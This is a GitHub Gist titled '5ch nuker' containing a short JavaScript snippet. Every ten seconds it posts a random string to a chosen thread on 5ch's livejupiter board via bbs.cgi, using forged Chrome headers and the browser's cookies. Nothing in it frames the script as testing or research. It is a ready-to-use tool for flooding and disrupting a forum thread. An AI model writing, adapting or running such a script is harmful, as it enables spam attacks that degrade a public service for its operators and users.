Created
November 27, 2023 10:49
-
-
Save EdamAme-x/0a7726d12d2f36e8a25a9bbff3a5caef to your computer and use it in GitHub Desktop.
5ch nuker
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const key = "..."; // thread key | |
| setInterval(() => { | |
| fetch("https://eagle.5ch.net/test/bbs.cgi", { | |
| "headers": { | |
| "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", | |
| "accept-language": "ja,en-US;q=0.9,en;q=0.8", | |
| "cache-control": "max-age=0", | |
| "content-type": "application/x-www-form-urlencoded", | |
| "sec-ch-ua": "\"Google Chrome\";v=\"119\", \"Chromium\";v=\"119\", \"Not?A_Brand\";v=\"24\"", | |
| "sec-ch-ua-mobile": "?0", | |
| "sec-ch-ua-platform": "\"Windows\"", | |
| "sec-fetch-dest": "document", | |
| "sec-fetch-mode": "navigate", | |
| "sec-fetch-site": "same-origin", | |
| "sec-fetch-user": "?1", | |
| "upgrade-insecure-requests": "1" | |
| }, | |
| "referrer": "https://eagle.5ch.net/test/read.cgi/livejupiter/" + key + "/l50", | |
| "referrerPolicy": "strict-origin-when-cross-origin", | |
| "body": "FROM=&mail=&MESSAGE=" + Math.random().toString(36).substring(3, 7) + "&bbs=livejupiter&key=" + key + "&time=" + Math.floor((Date.now() / 1000) + 75) + "&submit=%8F%91%82%AB%8D%9E%82%DE&oekaki_thread1=", | |
| "method": "POST", | |
| "mode": "cors", | |
| "credentials": "include" | |
| }); | |
| }, 10000) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment